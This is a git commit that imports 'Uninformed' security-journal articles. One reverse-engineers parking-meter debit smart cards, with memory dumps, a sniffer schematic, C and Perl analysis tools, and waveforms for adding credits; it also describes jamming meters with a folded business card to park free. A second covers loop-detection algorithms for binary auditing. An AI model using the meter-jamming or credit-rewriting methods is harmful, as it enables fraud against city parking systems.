1st import into tree

This commit is contained in:
Rui Reis 2016-12-15 17:41:58 +00:00
parent 1d06a57fbb
commit 6b097ec81b
73 changed files with 41019 additions and 0 deletions

1214
uninformed/1.1.txt Normal file

File diff suppressed because it is too large Load Diff

1219
uninformed/1.2.txt Normal file

File diff suppressed because it is too large Load Diff

752
uninformed/1.3.txt Normal file
View File

@ -0,0 +1,752 @@
==Uninformed Research==
|=-----------------------=[ Smart Parking Meters ]=---------------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ h1kari <h1kari@dachb0den.com> ]=-----------------=|
--=[ Contents ]=----------------------------------------------------------
1 - Introduction
2 - ISO7816
3 - Synchronous Cards
3.1 - Memory Cards
3.2 - Parking Meter Debit Cards
3.3 - The Simple Hack
4 - Memory Dump
5 - Synchronous Smart Card Protocol Sniffing
5.1 - Sniffer Design
5.2 - Sniffer Code
6 - Protocol Analysis
6.1 - Decoding Data
6.2 - Timing Graph
6.3 - Conclusions
7 - Conclusion
--[ 1 - Introduction ]----------------------------------------------------
If this whitepaper looks a little familiar to you, I'm going to admit
off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone
Cards: How to make your own!) and is using a similar format to Phrack
62-15 (Introduction for Playing Cards for Smart Profits). I highly
recommend you read both of them if you're trying to learn about smart
cards.
I'm sure that many of you that live near a major city have seen
parking meters that require you to pay money in order to park in a spot.
Upon initial analysis of these devices you'll notice there is a slot for
money to go in. On some, there is also a slot for a Parking Meter Debit
Card that you can purchase from the city. This article will analyze these
Parking Meters and their Debit Cards, show how they tick, and show how you
can defeat their security.
The end goal however is to provide enough information so you can
create your own tools to learn more about smart cards and how they work.
I have no intention of having people use this article to rip off the
government, this is for educational purposes only. My only hope is that by
getting this information out there, security systems will be designed more
thoroughly in the future.
PARKING METER
_,-----,_
,-' `-,
/ ._________. \
/ , | 00:00 <+-,-+------ Time/Credits Display
Meter Status ----+>'-''---------''-'<+----- Meter Status
| ,-------, |
| |\ |<+-------+----- Coin Slot
Smart Card Slot -----\--+->\ | | /
\ '----\--' /
\ /
\ /
\ /
\-----------/
| ,-------, |
Money --------+-+-->o | |
| | | |
| | | |
| '-------' |
\---------/
| |
For those not familiar with these devices, you can go to various
locations around town and purchase these Parking Meter Debit Cards that
are preloaded with $10, $20, or $50. To explain how to use these, I will
quote off of the instructions provided on the back of the cards:
.--------------------------------------------------------------------.
/ \
| PARKING METER DEBIT CARD |
| |
| 1. Insert debit card into meter in direction shown by arrow. |
| The dollar balance of the card will flash 4 times. |
| 2. The Meter will increment in 6 min. segments. |
| 3. When desired time is displayed, remove card. |
| |
| DID YOU BUY TOO MUCH TIME? |
| TO OBTAIN EXTRA TIME REFUND |
| |
| * Insert the same debit card that was used to purchase time |
| on the meter. Full 6 minute increments will be credited to |
| card. Increments of less than 6 minutes will be lost. |
| |
| Parking cards may be used for ************** meters |
| which have yellow posts. |
| |
\--------------------------------------------------------------------/
NOTE: The increments are now 4 min due to raising prices
I'm not including a lot of information that's provided in those
Phrack's that were mentioned, so if things look a little incomplete,
please read through them before emailing me with questions.
Here's a list of all of my resources:
- The ISO7816 Standard
- Phrack 48-10/11 & 62-15
- Towitoko ChipDrive 130
- Homebrew Synchronous Protocol Sniffer (Schematics Included)
- A few Parking Meter Debit Cards
- A few Parking Meters
- Computer with a Parallel Port
- A business card or two
--[ 2 - ISO7816 ]---------------------------------------------------------
The ISO 7816 standard is one of the few resources we have to work with
when reverse engineering a smart card. It provides us with basic knowledge
of pin layouts, what the different pins do, and how to interface with
them. Unfortunately, it mostly covers asynchronous cards and doesn't
really touch on how synchronous cards work. To get more detailed
information on this please read Phrack 48-10/11.
--[ 3 - Synchronous Cards ]-----------------------------------------------
Synchronous protocols are usually used with memory cards mainly to
reduce cost (since the card doesn't require an internal clock) and because
usually memory cards don't require much logic and are used for simple
applications. Asynchronous cards on the other hand have an internal clock
and can communicate with the reader at a fixed rate across the I/O line
(usually 9600 baud), asynchronous cards are usually used with processor
cards where more interaction is required (see Phrack 62-15).
----[ 3.1 - Memory Cards ]------------------------------------------------
Memory cards use a very simple protocol for sending data. First off,
because synchronous cards don't know anything about timing, their clock is
provided by the reader. In this situation, the reader can set the I/O line
when the clock is low (0v) and the card can set the I/O line when the
clock is high (5v). To dump all of the memory from a card, the reader
first sets the Reset line high to reset the card and keeps the clock
ticking. The first time the Reset line is low and the Clock is raised the
card will set the I/O line to whatever the 0 bit is in memory, the second
time it's raised, the card will set the I/O line to whatever the 1 bit is
in memory, etc. This is repeated until all of the data is dumped from the
card.
__________________
_| |___________________________________________ Reset
: :
: _____ : _____ _____ _____ _____
_:_______| |____:_| |_____| |_____| |_____| Clk
: : : : : : : : : :
_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____
_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address)
: : : : :
_: :_______:___________:___________:___________
_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data
Bit n Bit 0 Bit 1 Bit2 Bit3
(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10)
----[ 3.1 - Parking Meter Debit Cards ]-----------------------------------
Parking Meter Debit Cards behave very similarly to standard memory
cards, however they also have to provide some basic security to make sure
people can't get free parking. This is done by using a method similar to
the European Telephone Cards (SLE4406) where there is a section of memory
on the card that acts as a one-way counter where bits are set to a certain
amount of credits, then a security fuse is blown, and now the set bits can
only be flipped from 1 -> 0. This is a standard security mechanism that
makes it so people cannot recharge their cards once the credits have been
used. The only catch is that the way that the parking meters work makes it
so you can refund unused credits to the card.
----[ 3.2 - Parking Meter Debit Cards ]-----------------------------------
If my little introduction to Synchronous Smart Cards just went right
over your head, here's an example of how to attack Parking Meters without
having to deal with electronics or code. If you ever try putting an
invalid card into a parking meter, you'll notice that after about 90
seconds of flashing error messages, it will switch over to Out-of-Order
status. Now, for convenience sake, most cities allow you to park for free
in Out-of-Order spots. (Anyone see a loophole here???)
.----------------------------------------------------------------------.
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : <- insert folded side |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
'----------------------------------------------------------------------'
One simple method you can use for making it less obvious that
something in the slot is making it be Out-of-Order is to fold a business
card in half (preferably not yours) and insert it into the smart card
slot. It should be the perfect length that it will go in and be very
difficult to notice and/or take out. When you're finished parking, you
should be able to pull the business card out using a credit card or small
flathead screwdriver.
--[ 4 - Memory Dump ]-----------------------------------------------------
To explain how the cards handle credits and refunds, I'll first show
you how the memory on the card is laid out. This dump was done using my
Towitoko ChipDrive 130 using Towitoko's SmartCard Editor Software (very
useful). I highly suggest that you use a commercial smart card reader or
some sort of non-dumb reader for dealing with synchronous cards, dumb
mouse (and most home-brew) readers only work with asynchronous cards.
0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff
0x10: ffff ffff ffff ff00 0000 0000 0000 0000
0x20: 0000 0000 0000 0000 0000 0000 0000 0000
0x30: 0000 0000 0000 0000 0000 0000 0000 0000
0x40: 0000 0000 0000 0000 0000 0000 0000 0000
0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff
0x60: ffff ffff ffff ffff ffff ffff ffff ffff
0x70: ffff ffff ffff ffff ffff ffff ffff ffff
0x80: ffff ffff ffff ffff ffff ffff ffff ffff
0x90: ffff ffff ffff ffff ffff ffff ffff ffff
0xa0: fcff ffff ffff ffff ffff ffff ffff ffff
0xb0: ffff ffff ffff ffff ffff ffff ffff ffff
0xc0: ffff ffff
Now.. if we convert over the 0x50 line to bits and analyze it, we'll
notice this (note that bit-endianness is reversed):
0x50: 0000 0000 0000 0000 0000 0000 0000 0000
0x54: 0001 1111 1111 1111 1111 1111 1111 1111
0x58: 1111 1111 1111 1111 1111 1111 1111 1111
0x5a: 1111 1111 0011 1111 1111 1111 1111 1111
For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation
specifies bit offset), you get $0.10 on your card. For every bit that is 0
between 0x5b and 0xb0 you get $0.10 in refunds. The total of these two
counters equals the amount of credits on your card. Now, how they handle
people using the refunds is by having the buffer of bits inbetween 0x55:1
and 0x5b that can be used if there are refund bits that can be spent. This
only allows the user to use ~ $5 worth of refund bits. On this particular
card, the user has $0.60 worth of credits and $0.20 worth of refunds
making a total of $0.80 on the card (I know, I'm poor :-/).
--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------
Now that we've figured out how they store credits on the card, we need
to figure out how the reader writes to the card. To do this, we'll need
to somehow sniff the connection and reverse engineer their protocol. The
following section will show you how to make your own synchronous smart
card protocol sniffer and give you code for sniffing the connection.
----[ 5.1 - Sniffer Design ]----------------------------------------------
There's plenty of commercial hardware out there (Season) that allow
you to sniff asynchronous smart cards, but it's a totally different story
for synchronous cards. I wasn't able to find any hardware to do this (and
being totally dumb when it comes to electronics) found someone to help me
out with this design (thx XElf). It basically taps the lines between a
smart card and the reader and runs the signals through an externally
powered buffer to make sure our parallel port doesn't drain the
connection.
My personal implementation consists of a smart card socket I ripped
out of an old smart card reader, a peet's coffee card that I made ISO7816
pinouts on using copper tape, all connected by torn apart floppy drive
cables, and powered by a ripped apart usb cable. You should be able to
find some pics on the net if you search around, although I guarantee
whatever you come up with will be less ghetto than me.
Parallel Port
D10 - Ack - I6 o-------------------------,
|
D11 - Busy - I7 o-----------------------------,
| |
D12 - Paper Out - I5 o---------------------------------,
| | |
D13 - Select - I4 o-------------------------------------,
| | | |
D25 - Gnd o-----, | | | |
| | | | |
| | | | |
External 5V (USB) | | | | |
| | | | |
5V o------------------, | | | | |
| | | | | |
0V o-------*----*-----|---*-------------------|---|---|---|-----,
| | | | | | | | |
| | ,--==--==--==--==--==--==--==--==--==--==--, |
__+__ | |_ 20 19 18 17 16 15 14 13 12 11 | |
///// | | ] 74HCT541N | |
| |' 1 2 3 4 5 6 7 8 9 10 | |
| '--==--==--==--==--==--==--==--==--==--==--' |
| | | | | | | | | | | |
| | '---*---*---* | | | | '-----'
'-----*---------, ,---|---* | | |
| | ,-|---|---* | |
Smart Card | | | | | | *---|------,
,----------,----------, | | | | | | | *----, |
,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | |
| |----------|----------| | | | | | | | | | | | | | |
| ,-----|--* Reset | Vpp | | | | | | | | | | | | | | |
| | |----------|----------| | | | | |_| |_| |_| |_| | |
| | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | |
| | | |----------|----------| | | | | |10k|10k|10k|10k | |
| | | ,-|--* RF1 | RF2 *--|---* | | | | | | | |
| | | | '----------'----------' | | | '---*---*---*---' | |
| | *-|-------------------------|-|-|----------------------' |
| *-|-|-------------------------|-|-|------------------------'
| | | | | | |
| | | | Smart Card Reader | | |
| | | | ,----------,----------, | | |
'-------|--* Vcc | Gnd *--|-' | |
| | | |----------|----------| | |
'-----|--* Reset | Vpp | | |
| | |----------|----------| | |
'---|--* Clock | I/O *--|---' |
| |----------|----------| |
'-|--* RF1 | RF2 *--|-----'
'----------'----------'
----[ 5.2 - Sniffer Code ]------------------------------------------------
To monitor the connection, compile and run this code with a log
filename as an argument. This code is written for openbsd and uses it's
i386_iopl() function to get access to writing to the ports. You may need
to modify it to work on other OSs. Due to file i/o speed limitations, it
will log to the file whenever you hit ctrl+c.
/*
* Synchronous Smart Card Logger v1.0 [synclog.c]
* by h1kari <h1kari@dachb0den.com>
*/
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <machine/sysarch.h>
#include <i386/pio.h>
#define BASE 0x378
#define DATA (BASE)
#define STATUS (BASE + 1)
#define CONTROL (BASE + 2)
#define ECR (BASE + 0x402)
#define BUF_MAX (1024 * 1024 * 8) /* max log size 8mb */
int bufi = 0;
u_char buf[BUF_MAX];
char *logfile;
void
die(int signo)
{
int i, b;
FILE *fh;
/* open logfile and write output */
if((fh = fopen(logfile, "w")) == NULL) {
perror("unable to open lpt log file");
exit(1);
}
for(i = 0; i < bufi; i++)
printbits(fh, buf[i]);
/* flush and exit out */
fflush(fh);
fclose(fh);
_exit(0);
}
int
printbits(FILE *fh, int b)
{
fprintf(fh, "%d%d%d%d\n",
(b >> 7) & 1, (b >> 6) & 1,
(b >> 5) & 1, (b >> 4) & 1);
}
int
main(int argc, char *argv[])
{
unsigned char a, b, c;
unsigned int *ptraddr;
unsigned int address;
if(argc < 2) {
fprintf(stderr, "usage: %s <file>\n", argv[0]);
exit(1);
}
logfile = argv[1];
/* enable port writing privileges */
if(i386_iopl(3)) {
printf("You need to be superuser to use this\n");
exit(1);
}
/* clear status flags */
outb(STATUS, inb(STATUS) & 0x0f);
/* set epp mode, just in case */
outb(ECR, (inb(ECR) & 0x1f) | 0x80);
/* log to file when we get ctrl+c */
signal(SIGINT, die);
/* fetch dataz0r */
c = 0;
while(bufi < BUF_MAX) {
/* select low nibble */
outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04);
/* read low nibble */
if((b = inb(STATUS)) == c)
continue;
buf[bufi++] = c = b; /* save last state bits */
}
printf("buffer overflow!\n");
die(0);
}
It might also help to drop the priority level when running it, if it
looks like you're having timing issues:
# nice -n -20 ./synclog file.log
--[ 6 - Protocol Analysis ]-----------------------------------------------
Once we get our log of the connection, we'll need to run it through
some tools to analyze and decode the protocol. I've put together a couple
of simple tools that'll make your life a lot easier. One will simply
decode the bytes that are transferred across based on the state changes.
The other will graph out the whole conversation 2-dimensionally so you
can graphically view patterns in the connection.
----[ 6.1 - Decoding Data ]-----------------------------------------------
For decoding the data, we simply record bits to an input buffer when
the clock is in one state, and to an output buffer when the clock is in
the other. Then dump all of the bytes and reset our counter whenever
there's a reset. This should give us a dump of the data that's being
transferred between the two devices.
/*
* Synchronous Smart Card Log Analyzer v1.0 [analyze.c]
* by h1kari <h1kari@dachb0den.com>
*/
#include <stdio.h>
#ifdef PRINTBITS
#define BYTESPERROW 8
#else
#define BYTESPERROW 16
#endif
void
pushbit(u_char *byte, u_char bit, u_char n)
{
/* add specified bit to their byte */
*byte &= ~(1 << (7 - n));
*byte |= (bit << (7 - n));
}
void
printbuf(u_char *buf, int len, char *io)
{
int i, b;
printf("%s:\n", io);
for(i = 0; i < len; i++) {
#ifdef PRINTBITS
int j;
for(j = 7; j >= 0; j--)
printf("%d", (buf[i] >> j) & 1);
putchar(' ');
#else
printf("%02x ", buf[i]);
#endif
if((i % BYTESPERROW) == BYTESPERROW - 1)
printf("\n");
}
if((i % BYTESPERROW) != 0) {
printf("\n");
}
}
int
main(int argc, char *argv[])
{
u_char ibit, obit;
u_char ibyte, obyte;
u_char clk, rst, bit;
u_char lclk;
u_char ibuf[1024 * 1024], obuf[1024 * 1024];
int ii = 0, oi = 0;
char line[1024];
FILE *fh;
if(argc < 2) {
fprintf(stderr, "usage: %s <file>\n", argv[0]);
exit(1);
}
if((fh = fopen(argv[1], "r")) == NULL) {
perror("unable to open lpt log\n");
exit(1);
}
lclk = 2;
while(fgets(line, 1024, fh) != NULL) {
bit = line[0] - 48;
rst = line[2] - 48;
clk = line[3] - 48;
bit = bit ? 0 : 1;
if(lclk == 2) lclk = clk;
/* print out buffers when we get a reset */
if(rst) {
if(ii > 0 && oi > 0) {
printbuf(ibuf, ii, "input");
printbuf(obuf, oi, "output");
}
ibit = obit = 0;
ibyte = obyte = 0;
ii = oi = 0;
}
/* if clock high input */
if(clk) {
/* incr on clock change */
if(lclk != clk) obit++;
pushbit(&ibyte, bit, ibit);
/* otherwise output */
} else {
/* incr on clock change */
if(lclk != clk) ibit++;
pushbit(&obyte, bit, obit);
}
/* next byte */
if(ibit == 8) {
ibuf[ii++] = ibyte;
ibit = 0;
}
if(obit == 8) {
obuf[oi++] = obyte;
obit = 0;
}
/* save last clock */
lclk = clk;
}
}
----[ 6.2 - Timing Graph ]------------------------------------------------
Sometimes it really helps to see data graphically instead of just a
bunch of hex and 1's and 0's, so my friend pr0le threw together this perl
script that creates an image with a time diagram of the lines. By
analyzing this it made it easier to see how they were performing reads
and writes to the card.
#!/usr/bin/perl
use GD;
my $logfile = shift || die "usage: $0 <logfile>\n";
open( F, "<$logfile" );
my @lines = <F>;
close( F );
my $len = 3;
my $im_len = scalar( @lines );
my $w = $im_len * $len;
my $h = 100;
my $im = new GD::Image( $w, $h );
my $white = $im->colorAllocate( 255, 255, 255 );
my $black = $im->colorAllocate( 0, 0, 0 );
$im->fill( 0, 0, $white );
my $i = 1;
my $init = 0;
my ($bit1,$bit2,$rst,$clk);
my ($lbit1,$lbit2,$lrst,$lclk) = (undef,undef,undef,undef);
my ($x1, $y1, $x2, $y2);
foreach my $line ( @lines ) {
($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/);
if( $init ) {
&print_bit( $lbit1, $bit1, 10 );
&print_bit( $lbit2, $bit2, 30 );
&print_bit( $lrst, $rst, 50 );
&print_bit( $lclk, $clk, 70 );
}
($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk);
$init = 1;
$i++;
}
open( F, ">$logfile.jpg" );
binmode F;
print F $im->jpeg;
close( F );
exit;
sub print_bit {
my ($old, $new, $ybase) = @_;
if( $new != $old ) {
if( $new ) {
$im->line( $i*$len, $ybase+10, $i*$len, $ybase+20, $black );
$im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
} else {
$im->line( $i*$len, $ybase+20, $i*$len, $ybase+10, $black );
$im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
}
} else {
if( $new ) {
$im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
} else {
$im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
}
}
return;
}
----[ 6.3 - Conclusions ]-------------------------------------------------
This code showed how the reserved lines on the smart card are used in
conjunction with credit increments and decrements. This is an analysis of
how it triggers a credit deduct or add on the card:
DEDUCT $0.10:
___________ ___________
_________| |___________| |__________________ Reset
____________________________________
_____________________| |_____ Clk
___________
_________| |__________________________________________ I/O
___________
_________| |__________________________________________ Rsv1
Then issue write command:
00011001 00101000 11111111 00111100
01001001 00000000 01100010 10001101
11111111 11111111 01110111 10101101
ADD $0.20:
___________ ___________ _____
_________| |___________| |____________| Reset
____________________________________
_____________________| |_____ Clk
_____________________________________________
|__________________ I/O
___________________________________
_________| |__________________ Rsv1
Then issue write command:
00011001 00101000 11111111 00111100
01001001 00000000 01100010 10001101
11111111 11111111 01110111 10101101
_____
__________________________________________________________| Reset
________ ___________ ____________
| |___________| |___________| |_____ Clk
____________________ ________________________
| |___________| |_____ I/O
____________________ ________________________
| 1 Credit |___________| 2 Credits |_____ Rsv1
Since the parking meter will refund whatever remaining amount there is
to the card and doesn't have to do it one at a time like with decrements,
the write command supports writing multiple credits back onto the card.
Simply repeat the waveform above and assert Reset when you're finished
"refunding" however many credits you want.
--[ 7 - Conclusion ]------------------------------------------------------
By now, you're probably thinking that this article sucks because there
isn't any ./code that will just give you more $. Unfortunately, most
security smart card protocols are fairly proprietary and whatever code I
released probably wouldn't work in your particular city. And all of the
data and waveforms I've included in this article probably gives the city
it does correspond to, enough info to start camping white vans on my
front lawn. ;-o
Instead of lame vendor specific code, we're aiming to give you
something much more powerful in the next part to this article which will
allow you to emulate arbitrary smart cards and simple electronic
protocols (thx spidey). So stay tuned for the next uninformed article
from Dachb0den Labs.
-h1kari 0ut

380
uninformed/1.4.txt Normal file
View File

@ -0,0 +1,380 @@
Loop Detection
Peter Silberman
peter.silberman@gmail.com
1) Foreword
Abstract: During the course of this paper the reader will gain new knowledge
about previous and new research on the subject of loop detection. The topic of
loop detection will be applied to the field of binary analysis and a case study
will given to illustrate its uses. All of the implementations provided in this
document have been written in C/C++ using Interactive Disassembler (IDA)
plug-ins.
Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake,
skape, trew, Johnny Cache and everyone else at nologin who help with ideas, and
kept those creative juices flowing.
2) Introduction
The goal of this paper is to educate the reader both about why loop detection
is important and how it can be used. When a security researcher thinks of
insecure coding practices, things like calls to strcpy and sprintf are some of
the first things to come to mind. These function calls are considered low
hanging fruit. Some security researchers think of integer overflows or
off-by-one copy errors as types of vulnerabilities. However, not many people
consider, or think to consider, the mis-usage of loops as a security problem.
With that said, loops have been around since the beginning of time (e.g. first
coding languages). The need for a language to iterate over data to analyze
each object or character has always been there. Still, not everyone thinks to
look at a loop for security problems. What if a loop doesn't terminate
correctly? Depending on the operation the loop is performing, it's possible
that it could corrupt surrounding memory regions if not properly managed. If
the loop frees memory that no longer exists or is not memory, a double-free bug
could've been found. These are all things that could, and do, happen in a
loop.
As the low hanging fruit is eliminated in software by security researchers and
companies doing decent to moderate QA testing, the security researchers have to
look elsewhere to find vulnerabilities in software. One area that has only
been touched on briefly in the public relm, is how loops operate when
translated to binaries BugScan is an example of a company that has implemented
"buffer iteration" detection but hasn't talked publically about it.
http://www.logiclibrary.com. The reader may ask: why would one want to look at
loops? Well, a lot of companies implement their own custom string routines,
like strcpy and strcat, which tend to be just as dangerous as the standard
string routines. These functions tend to go un-analyzed because there is no
quick way to say that they are copying a buffer. Due to this reason, loop
detection can help the security research identify areas of interest. During
the course of this article the reader will learn of the different ways to
detect loops using graph analysis, how to implement loop detection, see a new
loop detection IDA plug-in, and a case study that will tie it all together.
3) Algorithms Used to Detect Loops
A lot of research has been done on the subject of loop detection. The
research, however, was not done for the purpose of finding and exploiting
vulnerabilities that exist inside of loops. Most research has been done with
an interest in recognizing and optimizing loops A good article about loop
optimization and compiler optimization is
http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf .
Research on the optimization of loops has led scientists to classify various
types of loops. There are two distinct categories to which any loop will
belong. Either the loop will be an irreducible loop Irreducible loops are
defined as "loops with multiple entry [points]"
(http://portal.acm.org/citation.cfm?id=236114.236115) or a reducible loop
Reducible loops are defined as "loops with one entry [point]"
(http://portal.acm.org/citation.cfm?id=236114.236115). Given that there are
two different distinct categories, it stands to reason that the two types of
loops are detected in different fashions. Two popular papers on loop detection
are Interval Finding Algorithm and Identifying Loops Using DJ Graphs. This
document will cover the most widely accepted theory on loop detection.
3.1) Natural Loop Detection
One of the most well known algorithms for loop detection is demonstrated in the
book Compilers Principles, Techniques, and Tools by Alfred V. Aho, Ravi Sethi
and Jeffrey D. Ullman. In this algorithm, the authors use a technique that
consists of two components to find natural loops A natural loop "Has a single
entry point. The header dominates all nodes in the loop."
(http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf
all loops are not natural loops.
The first component of natural loop detection is to build a dominator tree out
of the control flow graph (CFG). A dominator can be found when all paths to a
given node have to go through another node. A control flow graph is essentially
a map of code execution with directional information. The algorithm in the
book calls for the finding of all the dominators in a CFG. Let's look at the
actual algorithm.
Starting from the entry node, the algorithm needs to check if there is a path
to the slave from the entry node. This path has to avoid the master node. If
it is possible to get to the slave node without touching the master node, it
can be determined that the master node does not dominate the slave node. If it
is not possible to get to the slave node, it is determined that the master node
does dominate the slave. To implement this routine the user would call the
is_path_to(ea_t from, ea_t to, ea_t avoid) function included in loopdetection.cpp.
This function will essentially check to see if there is a path from the
parameter from that can get to the parameter to, and will avoid the node
specified in avoid. Figure illustrates this algorithm.
As the reader can see from Figure 1, there is a loop in this CFG. Let B to C
to D be the path of nodes that create a loop, it will be represented as
B->C->D. There is also another loop from nodes B->D. Using the algorithm
described above it is possible to verify which of these nodes is involved in
the natural loop. The first question to ask is if the flow of the program can
get from A to D while avoiding B. As the reader can see, it is impossible in
this case to get to D avoiding B. As such, a call to the is_path_to function
will tell the user that B Dominates D. This can be represented as B Dom D, and
B Dom C. This is due to the fact that there is no way to reach C or D without
going through B. One question that might be asked is how exactly does this
demonstrate a loop? The answer is that, in fact, it doesn't. The second
component of the natural loop detection checks to see if there is a link, or
backedge, from D to B that would allow the flow of the program to return to
node B to complete the loop. In the case of B->D there exists a backedge that
does complete the loop.
3.2) Problems with Natural Loop Detection
There is a very big problem with natural loops. The problem is with the
natural loop definition which is ``a single entry point whose header dominates
all the nodes in the loop''. Natural loop detection does not deal with
irreducible loops, as defined previously. This problem can be demonstrated in
figure
As the reader can see both B and D are entry points into C. Also neither D nor
B dominates C. This throws a huge wrench into the algorithm and makes it only
able to pick up loops that fall under the specification of a natural loop or
reducible loop It is important to note that it is next that it is next to
impossible to reproduce
4) A Different Approach to Loop Detection
The reader has seen how to detect dominators within a CFG and how to use that
as a component to find natural loops. The previous chapter described why
natural loop detection was flawed when trying to detect irreducible loops. For
binary auditing, the tool will need to be able to pick up all loops and then
let the user deduce whether or not the loops are interesting. This chapter
will introduce the loop algorithm used in the IDA plug-in to detect loops.
To come up with an algorithm that was robust enough to detect both loops in the
irreducible and reducible loop categories, the author decided to modify the
previous definition of a natural loop. The new definition reads "a loop can
have multiple entry points and at least one link that creates a cycle." This
definition avoids the use of dominators to detect loops in the CFG.
The way this alternative algorithm works is by first making a call to the
is_reference_to(ea_t to, ea_t ref) function. The function is_reference_to will
determine if there is a reference from the ea_t specified by ref to the
parameter to. This check within the loop detection algorithm determines if
there is a backedge or link that would complete a loop. The reason this check
is done first is for speed. If there is no reference that would complete a
loop then there is no reason to call is_path_to, thus preventing unnecessary
calculations. However, if there is a link or backedge, a call to the
overloaded function is_path_to(ea_t from, ea_t to) is used to determine if the
nodes that are being examined can even reach each other. The is_path_to function
simulates all possible code execution conditions by following all possible
edges to determine if the flow of execution could ever reach parameter to when
starting at parameter from. The function is_path_to(ea_t from, ea_t to) returns
one (true) if there is indeed a path going from from to to. With both of these
functions returning one, it can be deduced that these nodes are involved in the
loop.
4.1) Problems with new approach
In every algorithm there can exists small problems, that make the algorithm far
from optimal. This problem applies to the new approach presented above. The
algorithm presented above has not been optimized for performance. The algorithm
runs in a time of O(N2), which carries quite a load if there are more than 600
or so nodes.
The reason that the algorithm is so time consuming is that instead of
implementing a Breadth First Search (BFS), a Depth First Search (DFS) was
implemented, in the is_path_to function which computes all possible paths to and
from a given node. Depth First Search is much more expensive than Breadth First
Search, and because of that the algorithm may in some rare cases suffer. If
the reader is interested in how to implement a more efficient algorithm for
finding the dominators, the reader should check out Compiler Design
Implementation by Steven S. Muchnick.
It should be noted that in future of this plug-in there will be optimizations
made to the code. The optimizations will specifically deal new implementations
of a Breadth First Search instead of the Depth First Search, as well as other
small optimizations.
5) Loop Detection Using IDA Plug-ins
In every algorithm and theory there exists small problems. It is important to
understand the algorithm presented
The plug-in described in this document uses the Function Analyzer Class
(functionanalyzer) that was developed by Pedram Amini
(http://labs.idefense.com) as the base class. The Loop Detection
(loopdetection) class uses inheritance to glean its attributes from Function
Analyzer. The reason inheritance is used is primarily for ease of development.
Inheritance is also used so that instead of having to re-add functions to a new
version of Function Analyzer, the user only has to replace the old file. The
final reason inheritance is used is for code conformity, which is accomplished
by creating virtual functions. These virtual functions allow the user to
override methods that are implemented in the Function Analyzer. This means
that if a user understands the structure of function analyzer, they should not
have a hard time understanding loop detections structure.
5.1) Plug-in Usage
To best utilize this plug-in the user needs to understand its features and
capabilities. When a user runs the plug-in they will be prompted with a window
that is shown in figure . Each of the options shown in figure are described
individually.
Graph Loop
This feature will visualize the loops, marking the entry of a loop with green
border, the exit of a loop with a red border and a loop node with a yellow
border. Highlight Function Calls This option allows the user to highlight the
background of any function call made within the loop. The highlighting is done
within IDA View.
Output Stack Information
This is a feature that is only enabled with the graph loop option. When this
option is enabled the graph will contain information about the stack of the
function including the variables name, whether or not it is an argument, and
the size of the variable. This option is a great feature for static auditing.
Highlight Code
This option is very similar to Highlight Function except instead of just
highlighting function calls within loops it will highlight all the code that is
executed within the loops. This makes it easier to read the loops in IDA View
Verbose Output
This feature allows the user to see how the program is working and will give
more information about what the plug-in is doing.
Auto Commenting
This option adds comments to loops nodes, such as where the loop begins, where
it exits, and other useful information so that the user doesn't have to
continually look at the graph.
All Loops Highlighting of Functions
This feature will find every loop within the IDA database. It will then
highlight any call to any function within a loop. The highlighting is done
within the IDA View making navigation of code easier.
All Loops Highlighting of Code
This option will find every loop within the database. It will then highlight
all segments of code involved in a loop. The highlighting of code will allow
for easier navigation of code within the IDA View.
Natural Loops
This detection feature allows the user to only see natural loops. It may not
pick up all loops but is an educational implementation of the previously
discussed algorithm.
Recursive Function Calls
This detection option will allow the user to see where recursive function calls
are located.
5.2) Known Issues
There a couple of known issues with this plug-in. It does not deal with rep*
instructions, nor does it deal with mov** instructions that might result in
copied buffers. Future versions will deal with these instructions, but since
it is open-sourced the user can make changes as they see fit. Another issue is
that of ``no-interest''. By this the author means detecting loops that aren't
of interest or don't pose a security risk. These loops, for example, may be
just counting loops that don't write memory. Halvar Flake describes this topic
in his talk that was given at Blackhat Windows 2004. Feel free to read his
paper and make changes accordingly. The author will also update the plug-in
with these options at a later date.
5.3) Case Study: Zone Alarm
For a case study the author chose Zone Alarm's vsdatant.sys driver. This
driver does a lot of the dirty work for Zone Alarm such as packet filtering,
application monitoring, and other kernel level duties. Some may wonder why it
would be worthwhile to find loops in a driver. In Zone Alarm's case, the user
can hope to find miscalculations in lengths where they didn't convert a signed
to unsigned value properly and therefore may cause an overflow when looping.
Anytime an application takes data in remotely that may be type-casted at some
point, there is always a great chance for loops that overflow their bounds.
When analyzing the Zone Alarm driver the user needs to select certain options
to get a better idea of what is going on with loops. First, the user should
select verbose output and All Loops Highlighting of Functions to see if there
are any dangerous function calls within the loop. This is illustrated in
figure .
After running through the loop detection phase, some interesting results are
found that are shown in figure .
Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader
will need to find the loop's entry point, which is at:
.text:00011A1E jz short loc_11A27
At the loop's entry point, the reader will notice:
.text:00011A27 push 206B6444h ; Tag
.text:00011A2C push edi ; NumberOfBytes
.text:00011A2D push 1 ; PoolType
.text:00011A2F call ebp ;ExAllocatePoolWithTag
